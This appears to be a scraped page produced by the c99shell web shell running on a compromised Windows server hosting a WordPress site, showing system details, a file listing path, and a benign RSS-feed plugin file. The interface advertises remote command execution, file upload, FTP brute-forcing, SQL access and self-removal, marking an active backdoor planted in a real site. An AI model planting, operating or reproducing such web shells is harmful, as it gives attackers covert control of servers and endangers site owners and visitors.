!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbre\cumbreclima\wp-content\plugins\wp-pagenavi-style\includes\   drwxrwxrwx
Free 3.26 GB of 39.52 GB (8.25%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     common_functions.php (979 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 Function to get RSS feed Results
*/
if(!function_exists('ns_wp_common_get_feeds'))
{
    function 
ns_wp_common_get_feeds($feed)
    {
    include_once(
ABSPATH WPINC '/feed.php');
    
// Get a SimplePie feed object from the specified feed source.
    
$rss fetch_feed($feed);
    if (!
is_wp_error$rss ) ) : // Checks that the object is created correctly 
    // Figure out how many total items there are, but limit it to 5. 
    
$maxitems $rss->get_item_quantity(5); 
    
// Build an array of all the items, starting with element 0 (first element).
    
$rss_items $rss->get_items(0$maxitems); 
    endif;
    echo 
'<ol class="ns_wp_rss_list">';
    if (
$maxitems == 0) echo '<li>No items.</li>';
    else
    
// Loop through each feed item and display each item as a hyperlink.
    
foreach ( $rss_items as $item ) : 
    echo 
'<li>';
    echo 
'<a href="'.$item->get_permalink().'" title="">'.$item->get_title().'</a></li>';
    endforeach; 
    echo 
'</ol>';

    }
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--